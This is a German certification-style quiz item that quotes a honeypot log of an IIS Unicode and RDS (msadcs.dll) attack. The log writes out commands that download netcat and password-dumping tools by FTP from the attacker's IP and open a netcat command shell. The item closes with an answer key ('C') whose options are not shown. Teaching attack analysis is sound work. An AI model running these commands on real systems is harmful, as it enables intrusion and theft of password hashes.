NEUE FRAGE 180
Der folgende Auszug stammt aus einem Honeypot-Protokoll, das bei lab.wiretrip.net gehostet wurde. Kurz gemeldete Unicode-Angriffe von 213.116.251.162. Die File Permission Canonicalization-Schwachstelle (UNICODE-Angriff) erlaubt es, Skripte in beliebigen Ordnern auszuführen, die normalerweise nicht das Recht haben, Skripte auszuführen. Der Angreifer versucht einen Unicode-Angriff und hat schließlich Erfolg beim Anzeigen der boot.ini.
Dann geht er dazu über, mit RDS zu spielen, und zwar über msadcs.dll. Die RDS-Schwachstelle ermöglicht es einem böswilligen Benutzer, SQL-Anweisungen zu erstellen, die Shell-Befehle (z. B. CMD.EXE) auf dem IIS-Server ausführen. Er führt eine kurze Abfrage durch, um festzustellen, dass das Verzeichnis existiert, und eine Abfrage an msadcs.dll zeigt, dass es korrekt funktioniert. Der Angreifer stellt eine RDS-Abfrage, die dazu führt, dass die Befehle wie unten gezeigt ausgeführt werden.
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
Was können Sie aus der gegebenen Ausbeutung ableiten?
Aus dem Protokoll geht eindeutig hervor, dass es sich um einen Remote-Exploit handelt, bei dem drei Dateien heruntergeladen werden, daher ist die richtige Antwort C.
Eine Antwort hinterlassen